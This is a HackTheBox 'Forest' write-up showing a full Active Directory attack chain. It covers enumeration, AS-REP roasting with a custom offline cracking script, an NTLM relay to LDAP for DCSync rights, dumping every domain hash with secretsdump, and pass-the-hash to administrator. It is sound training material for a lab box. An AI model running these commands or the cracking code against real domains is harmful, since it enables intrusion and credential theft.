HackTheBox Forest Writeup
Overview
This box gave me the opportunity to work through two common Active Directory weaknesses, a user-account misconfiguration (Kerberos pre-authentication disabled) and an NTLM relay attack against LDAP, while reinforcing my prior knowledge of tools like nmap and enum4linux.
Information Gathering
We start by running nmap to get an overview of the ports open on the system.
> nmap -sC -sV 10.10.10.161
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-09 06:40 EST
Nmap scan report for 10.10.10.161
Host is up (0.40s latency).
Not shown: 989 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-09 11:49:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/9%Time=5E171167%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h48m00s, deviation: 4h37m10s, median: 7m58s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2020-01-09T03:51:55-08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-01-09T11:51:54
|_ start_date: 2020-01-09T11:18:57
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 353.01 seconds
Looking at our initial scan we can tell that this machine is a domain controller for htb.local: the classic Active Directory service set is present, with Kerberos on port 88, RPC on port 135, the NetBIOS session service on port 139, SMB on port 445, LDAP on 389 (LDAPS on 636), the global catalog on 3268/3269, kpasswd on 464 and WinRM on 5985. Two details in the host script results matter later: SMB message signing is required, so NTLM relay to SMB on this host is off the table, and there is a clock skew of several minutes against the DC. Kerberos rejects authenticators more than five minutes out of sync, so if a Kerberos step later fails with a clock skew error, sync your clock against the target first (for example with `ntpdate 10.10.10.161`).
For future reference, Kerberos is the authentication protocol Windows domains use in preference to NTLM. The general idea is that the user first sends an authentication request (AS-REQ) to the domain controller, which acts as the Key Distribution Center (KDC). The KDC normally requires pre-authentication, a timestamp encrypted with a key derived from the user's password, before it replies with an AS-REP containing a Ticket Granting Ticket (TGT) and a session key encrypted under that same user key. The client keeps the TGT until it expires and then requests a new one. To reach a service, the client presents the TGT together with the Service Principal Name (SPN) of the service to the KDC in a TGS-REQ, and receives a service ticket (TGS-REP) encrypted with the service account's key, which it then presents to the service to gain access.
Continuing on with enumeration we can run enum4linux, a tool that wraps the Samba utilities to enumerate Windows hosts over SMB and RPC. It can retrieve password policies, user names, group memberships and domain information, often without credentials via a null session.
> enum4linux -a 10.10.10.161
The -a flag means "all enumeration". This outputs a huge amount of text so I won't include all of it here; however, looking through the results we are able to find a list of domain users.
Administrator
Guest
krbtgt
DefaultAccount
sebastien
lucinda
svc-alfresco
andy
mark
santi
gilberte
J.Robinson
Getting User
A list of users opens up a huge range of possible attacks. From general reading a few days before attempting this box I had come across a blog post by harmj0y about AS-REP Roasting. This attack relies on the "Do not require Kerberos preauthentication" setting being enabled on a user account.
Referring back to the Kerberos flow covered above, pre-authentication is what stops an anonymous client from obtaining an AS-REP for an arbitrary user. With it disabled, the KDC hands the AS-REP to anyone who asks in that user's name, and because part of the reply is encrypted with a key derived from the user's password, it can be taken offline and cracked against a wordlist without talking to the DC again and without triggering account lockout.
To attempt to exploit this misconfiguration I started by looking for a tool within the impacket library. The impacket library is a collection of python classes for working with network protocols and contains a variety of categories including kerberos, windows secrets, MiTM Attacks, WMI and SMB.
As the misconfiguration is related to the granting of tickets we know that this is going to be a Kerberos attack. Looking through the example scripts we can see GetNPUsers.py, which requests AS-REPs for users that have the "Do not require Kerberos preauthentication" property set and prints them in a crackable format.
> ./GetNPUsers.py FOREST.htb.local/<user> -no-pass -dc-ip 10.10.10.161
I ran this command with each discovered username until I was finally given a hash for the user svc-alfresco. The manual loop can be avoided: GetNPUsers.py accepts `-usersfile <file>` to try a whole list in one run and `-format john` or `-format hashcat` to choose the output format. Without credentials it can only test the names you supply; with a valid domain account it can instead query LDAP for every account that has the flag set.
$krb5asrep$23$svc-alfresco@HTB:e8bd5e316737b7a573591b64af83792f$2aafb1de402e03dd15f163dc9ca176b168318cdfeb47a1bf367b606147b0c5521267d76f0ae3aca9e40a8ad70318150e4a670c13b713e75a3e8a000e66d93d10640cc7cad1372f1c4d6ef66e783197316bba7ab2deadfb689ace101fadb8d38ad5bf9c212ee1097bc80a95435be320b63937233c0e84ac66b8f200499c525833fc29de3c85c7e7733a347de036670dd3dd3acc1b61cdd96c97fe26be56c5d8819b4b78e12e260f0f17ab1630e5996e70e8d2a36b43c539fe9252e3f16f375091bae928a9acab44d929fcf78f6afaa81edb12de1b1dac436f92a5847525e233ae
I could then run john to crack this hash and get the password, which was "s3rvice". The `$krb5asrep$23$` prefix identifies an RC4-HMAC (etype 23) AS-REP; john handles it with its krb5asrep format and hashcat as mode 18200, and a wordlist such as rockyou.txt is usually enough for a service account password like this one.
> john svc-alfrescoHash.txt
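To make concrete why this cracks offline, here is an added example (my own code for this writeup, not from impacket or from harmj0y's post) that builds a `$krb5asrep$23$` line for a constructed AS-REP and then cracks it the way john does. Under etype 23 the AS-REP enc-part is RC4-HMAC (RFC 4757) keyed with the user's NT hash (MD4 of the UTF-16LE password), and the 16-byte checksum before the `$` lets each guess be verified with no oracle. The plaintext body and confounder are constructed stand-ins, not a real EncASRepPart; the username, realm and password are the ones from this box. MD4 is implemented inline because hashlib's md4 is often unavailable under OpenSSL 3.

```python
import hashlib
import hmac
import struct
from typing import Optional

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled under OpenSSL 3."""
    def rotl(x, n):
        x &= MASK
        return ((x << n) | (x >> (32 - n))) & MASK
    f = lambda x, y, z: (x & y) | (~x & MASK & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1
            a = rotl(a + f(b, c, d) + x[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = rotl(a + g(b, c, d) + x[(i % 4) * 4 + i // 4] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rotl(a + h(b, c, d) + x[k] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); it is also the RC4-HMAC (etype 23) Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


AS_REP_USAGE = 8  # key usage number for the AS-REP enc-part under RC4-HMAC (RFC 4757)


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, confounder: bytes):
    """RFC 4757 encryption: returns (checksum, ciphertext) as they appear in the AS-REP."""
    k1 = hmac.new(key, struct.pack("<I", AS_REP_USAGE), hashlib.md5).digest()
    data = confounder + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum, rc4(k3, data)


def rc4_hmac_decrypt(key: bytes, checksum: bytes, ciphertext: bytes) -> Optional[bytes]:
    """Returns the plaintext if the checksum verifies under this key, else None."""
    k1 = hmac.new(key, struct.pack("<I", AS_REP_USAGE), hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    data = rc4(k3, ciphertext)
    if not hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum):
        return None
    return data[8:]  # strip the 8-byte confounder


def as_rep_line(user: str, realm: str, password: str, plaintext: bytes, confounder: bytes) -> str:
    """Produce a $krb5asrep$23$ line in the layout GetNPUsers.py prints (constructed here, not captured)."""
    checksum, enc = rc4_hmac_encrypt(nt_hash(password), plaintext, confounder)
    return f"$krb5asrep$23${user}@{realm}:{checksum.hex()}${enc.hex()}"


def crack_as_rep(line: str, wordlist) -> Optional[str]:
    """Offline guessing: derive the key from each candidate and check whether the checksum verifies."""
    _, tag, etype, principal_and_cksum, enc_hex = line.split("$")
    assert tag == "krb5asrep" and etype == "23", "only RC4-HMAC AS-REPs are handled here"
    checksum = bytes.fromhex(principal_and_cksum.split(":")[1])
    ciphertext = bytes.fromhex(enc_hex)
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), checksum, ciphertext) is not None:
            return candidate
    return None


# Constructed demo: the body is stand-in bytes, not a real EncASRepPart; the confounder is fixed.
SAMPLE = as_rep_line("svc-alfresco", "HTB", "s3rvice", b"constructed EncASRepPart stand-in", b"\x01" * 8)

if __name__ == "__main__":
    print(SAMPLE)
    print("cracked:", crack_as_rep(SAMPLE, ["Welcome1", "Password1", "s3rvice"]))
```

Feed it the real line from GetNPUsers and a proper wordlist and it does the same job john did, only far slower. The point to take away is that the NT hash is the whole secret: it is the key for etype 23, so the same value dumped later in this box can be used for overpass-the-hash as well, and once pre-authentication is disabled nothing but a strong, unique service account password stands in the way.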
The final step was to use these credentials to get a shell. As we saw in the nmap scan, port 5985 is open, which is WinRM (Windows Remote Management) over HTTP. Evil-WinRM gives you an interactive PowerShell session over it with valid credentials, provided the account is allowed to connect (a member of Remote Management Users or a local administrator on the target).
> ./evil-winrm.rb -i 10.10.10.161 -u 'htb\svc-alfresco' -p 's3rvice'
You can now access user.txt in the Desktop folder of svc-alfresco.
Elevating Privileges Part 1
Now that I had a user account I started my enumeration by looking at the domain groups.
> net groups
Group Accounts for \\
-------------------------------------------------------------------------------
*$D31000-NSEL5BRJ63V7
*Cloneable Domain Controllers
*Compliance Management
*Delegated Setup
*Discovery Management
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Exchange Servers
*Exchange Trusted Subsystem
*Exchange Windows Permissions
*ExchangeLegacyInterop
*Group Policy Creator Owners
*Help Desk
*Hygiene Management
*Key Admins
*Managed Availability Servers
*Organization Management
*Privileged IT Accounts
*Protected Users
*Public Folder Management
*Read-only Domain Controllers
*Recipient Management
*Records Management
*Schema Admins
*Security Administrator
*Security Reader
*Server Management
*Service Accounts
*test
*UM Management
*View-Only Organization Management
The command completed with one or more errors.
Starting with net group we are given the full list of domain groups, and the Exchange-related ones (Exchange Windows Permissions, Exchange Trusted Subsystem, Organization Management) immediately stand out as non-default.
Whilst researching these I found a blog post about an NTLM relay attack (PrivExchange) that relies on the Exchange Windows Permissions group, which in a default Exchange installation holds WriteDacl over the domain object. Before we can use it, we need a user that is in that group.
Using the following command we can see that svc-alfresco isn't currently part of the Exchange Windows Permissions group, so we need to find a way to add it.
> net user /domain svc-alfresco
User name svc-alfresco
Full Name svc-alfresco
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 3/20/2020 11:14:45 PM
Password expires Never
Password changeable 3/21/2020 11:14:45 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/23/2019 4:09:47 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users *Service Accounts
The command completed successfully.
We can add svc-alfresco to the group with a plain net group command. This only succeeds because svc-alfresco already has the right to modify group membership through its own nested group memberships (it sits in the custom Service Accounts group), so on another target it is worth checking what those parent groups are nested in before relying on this. Note that this is a domain change that is logged on the DC.
> net group "Exchange Windows Permissions" svc-alfresco /ADD
The command completed successfully.
Going back to look at svc-alfresco’s groups again we can see that it has been added.
> net user /domain svc-alfresco
User name svc-alfresco
Full Name svc-alfresco
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 3/20/2020 11:14:45 PM
Password expires Never
Password changeable 3/21/2020 11:14:45 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 9/23/2019 4:09:47 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Exchange Windows Perm*Domain Users
*Service Accounts
The command completed successfully.
Elevating Privileges Part 2
Following that blog post, the first thing to run is impacket's ntlmrelayx.py, which listens for incoming NTLM authentication and relays it to LDAP on the domain controller:
> ./ntlmrelayx.py -t ldap://10.10.10.161 --escalate-user svc-alfresco
-t specifies the relay target, here the LDAP service on 10.10.10.161. Rather than creating a new privileged user (ntlmrelayx's default when the relayed account has enough rights), --escalate-user tells it to modify the domain ACL so that the existing user we name gains DCSync (replication) rights. Relaying to LDAP is only possible here because the authentication will arrive over HTTP; an NTLM authentication originating from SMB would carry the signing flag and be rejected by LDAP unless that flag were stripped.
With this running, the next step in the PrivExchange attack is to make the Exchange server authenticate to our HTTP listener. privexchange.py does this by asking Exchange Web Services (EWS) to push a notification to a URL we control:
> ./privexchange.py -ah 10.10.14.27 10.10.10.161 -u 'svc-alfresco' -d htb.local
Password:
INFO: Using attacker URL: http://10.10.14.231/privexchange/
Traceback (most recent call last):
File "privexchange.py", line 225, in <module>
main()
File "privexchange.py", line 140, in main
session.request("POST", ews_url, POST_BODY % (args.exchange_version, attacker_url), headers)
File "/usr/lib/python2.7/httplib.py", line 1069, in request self._send_request(method, url, body, headers)
File "/usr/lib/python2.7/httplib.py", line 1109, in _send_request self.endheaders(body)
File "/usr/lib/python2.7/httplib.py", line 1065, in endheaders self._send_output(message_body)
File "/usr/lib/python2.7/httplib.py", line 892, in _send_output self.send(msg)
File "/usr/lib/python2.7/httplib.py", line 854, in send self.connect()
File "/usr/lib/python2.7/httplib.py", line 1282, in connect HTTPConnection.connect(self)
File "/usr/lib/python2.7/httplib.py", line 831, in connect self.timeout, self.source_address)
File "/usr/lib/python2.7/socket.py", line 575, in create_connection raise err
socket.error: [Errno 111] Connection refused
The traceback shows that privexchange.py could not reach EWS on 10.10.10.161 (connection refused: nothing is listening for it on the DC, and nmap showed no 443), so nothing will be relayed from Exchange itself. The attack still works because we can supply the authentication ourselves: svc-alfresco is now in Exchange Windows Permissions and therefore holds the WriteDacl right on the domain, so relaying its own NTLM authentication to LDAP is enough.
We therefore browse to http://localhost/privexchange and enter svc-alfresco's credentials when prompted. The browser answers the listener's NTLM challenge with those credentials and ntlmrelayx forwards them to LDAP.
If you now look back to the terminal where you executed the ntlmrelayx command it should show the incoming connection and the ACL modification:
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 127.0.0.1, attacking target ldap://10.10.10.161
[*] HTTPD: Client requested path: /privexchange
[*] HTTPD: Client requested path: /privexchange
[*] HTTPD: Client requested path: /privexchange
[*] Authenticating against ldap://10.10.10.161 as \svc-alfresco SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User svc-alfresco now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20200109-211420.restore
Getting Root
svc-alfresco now has replication rights on the domain, so going back to impacket we can use secretsdump.py to perform a DCSync and dump every account's hashes, including the administrator's.
> ./secretsdump.py htb.local/svc-alfresco@10.10.10.161 -just-dc
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:a19bb00ce4342a7fb668b0c2028ab9a9:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
The -just-dc flag tells secretsdump to extract only the NTDS.DIT secrets (NTLM hashes and Kerberos keys) over DRSUAPI, which is exactly what DCSync rights grant, and to skip the SAM and LSA dumping that would need local administrator access on the host.
At the top of the output we have the Administrator hash, which we could attempt to crack:
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Cracking this hash fails, so we need to use it another way.
From prior reading I knew that rather than cracking an NT hash you can authenticate with it directly (pass-the-hash), because NTLM authentication only ever uses the hash, never the password. impacket's wmiexec.py supports this through the -hashes LMHASH:NTHASH option; the LM half is the empty-LM value aad3b435b51404eeaad3b435b51404ee seen throughout the dump.
Running wmiexec returned a CMD shell with full administrator privileges.
> ./wmiexec.py htb/administrator@10.10.10.161 -hashes 'aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6'
You can now access root.txt in the Desktop folder of administrator.